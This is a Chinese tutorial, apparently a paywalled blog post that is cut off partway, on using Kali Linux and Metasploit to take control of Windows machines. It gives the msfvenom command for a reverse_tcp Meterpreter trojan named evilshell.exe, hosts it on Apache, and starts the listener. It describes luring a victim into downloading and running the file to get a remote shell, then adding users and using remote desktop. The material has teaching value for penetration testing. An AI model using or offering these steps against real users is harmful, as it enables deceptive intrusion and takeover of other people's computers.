本文介绍了如何在Kali Linux中使用Metasploit框架生成木马并控制Windows系统。首先,通过msfvenom命令生成reverse_tcp类型的木马,并将其上传至Apache服务器。接着,启动Metasploit handler来监听受害者连接。诱导Windows用户下载并执行木马后,Kali系统将获取到Meterpreter shell,从而可以进行进一步的渗透测试,例如添加用户和远程桌面连接。
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。
其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。
二、步骤:
Step1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe
-p 参数后跟上payload,攻击成功后要做什么事情
lhost 后跟监听的IP
lpost 后跟监听端口
-f 后跟要生成后门文件的类型
>重定向
Step2:将生成的木马文件evilshell.exe 拷贝到/var/www/html,开启apache服务,在肉鸡上打开浏览器,访问该站点(Kali的IP),下载木马文件。
cp evilshell.exe /var/www/html/
service apache2 start
Step3:开启MSF,提前查看postgresql运行状态 msfconsole
ps -aux |grep postgresql
msfconsole
exploits:开发利用,用来攻击某些服务、平台、系统等用到的工具
p
最低0.47元/天 解锁文章
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
